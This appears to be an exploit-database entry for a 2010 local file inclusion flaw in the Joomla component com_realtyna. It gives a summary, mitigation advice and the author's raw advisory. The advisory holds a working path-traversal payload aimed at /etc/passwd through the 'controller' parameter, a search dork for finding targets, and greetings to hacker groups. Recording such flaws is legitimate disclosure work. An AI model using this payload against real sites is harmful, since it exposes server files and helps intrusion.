Joomla Component com_realtyna LFI vulnerability

vendor:

com_realtyna

by:

MISTERFRIBO

7,5

CVSS

HIGH

LFI vulnerability

CWE

Product Name: com_realtyna

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_realtyna LFI vulnerability

A Local File Inclusion (LFI) vulnerability exists in Joomla Component com_realtyna. An attacker can exploit this vulnerability to read sensitive files on the server. The vulnerable parameter is ‘controller’ which is located in the URL. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious ‘controller’ parameter value. The malicious value contains relative path traversal characters (../). This will allow the attacker to read sensitive files on the server.

Mitigation:

To mitigate this vulnerability, the application should validate the user input and should not allow any relative path traversal characters (../).

Source

Exploit-DB raw data:

=================================================
Joomla Component com_realtyna LFI vulnerability
=================================================


[!]===========================================================================[!]

[~] Joomla Component com_realtyna LFI vulnerability
[~] Author : MISTERFRIBO
[~] Homepage : http://www.indonesianhacker.or.id
[~] Vendor: http://software.realtyna.com/
[~] Date : 23 june, 2010

[!]===========================================================================[!]

[^] dork : inurl:"joomla"
[!]===========================================================================[!]

[ Vulnerable File ]=-

http://[localhost]/index.php?option=com_realtyna&controller=[FRIBO]

[ XpL ]=-

../../../../../../../../../../../../../../../etc/passwd%00




[!]===========================================================================[!]

[ Thx TO ]=-

[+] Indonesian Hacker Team, Arumbia, IndonesianCoder Team, Kill-9,
Yogyacarderlink, ServerIsDown
[+] tukulesto,Kamtiez,xr0b0t si om
bagus,arianom,N4CK0,Jundab,bobyhikaru,gonzhack,senot,Jack-
[+]
Contrex,YadoY666,bumble_be,MarahMeraH,Suddendeath,r4tu_l364h,IBL13Z,r3m1ck
[+] ELVIN4,Gh4mb4s,vYcOd,ayy,otong,CS-31,yur4kh4,ranggamagic
[+] v3n0m, z0mb13, setanmuda, Jali, Hmei7

[ NOTE ]=-

[+] Mrs.Fribo Jangan Marah Terus Donk. LoVe u saiiank :*
[+] eLv1n4 where are you?
[+] papi karma666 and mami winda, Selamat ya :D


[ Spoiler ]=-

[+] Indonesian Hacker Team Was Here
[+] www.fribo.tv